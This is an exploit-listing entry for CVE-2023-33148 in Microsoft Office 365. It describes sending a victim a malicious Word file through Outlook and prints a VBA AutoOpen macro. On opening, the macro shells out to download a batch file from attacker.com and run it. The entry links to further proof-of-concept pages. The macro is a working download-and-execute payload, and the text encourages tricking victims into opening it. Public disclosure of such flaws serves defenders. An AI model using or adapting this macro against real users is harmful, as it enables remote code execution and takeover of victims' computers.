Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.

Author: nu11secur1ty
type: remote
platform: multiple
port: nan
date_added: 2023-07-20 
date_updated: 2023-07-20 
verified: 0 
codes: CVE-2023-33148 
tags: 
aliases:  
screenshot_url:  
application_url: 

## Title: Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE.
## Author: nu11secur1ty
## Date: 07.18.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/microsoft-office
## Reference: https://portswigger.net/web-security/access-control
## CVE-2023-33148


## Description:
The Microsoft Office 365 Version 18.2305.1222.0 app is vulnerable to
Elevation of Privilege.
The attacker can use this vulnerability to attach a very malicious
WORD file in the Outlook app which is a part of Microsoft Office 365
and easily can trick the victim to click on it - opening it and
executing a very dangerous shell command, in the background of the
local PC. This execution is without downloading this malicious file,
and this is a potential problem and a very dangerous case! This can be
the end of the victim's PC, it depends on the scenario.

## Staus: HIGH Vulnerability

[+]Exploit:

- Exploit Server:

```vb
Sub AutoOpen()
  Call Shell("cmd.exe /S /c" & "curl -s
https://attacker.com/uqev/namaikitiputkata/golemui.bat > salaries.bat
&& .\salaries.bat", vbNormalFocus)
End Sub

```

## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33148)

## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33148.html)

## Time spend:
00:35:00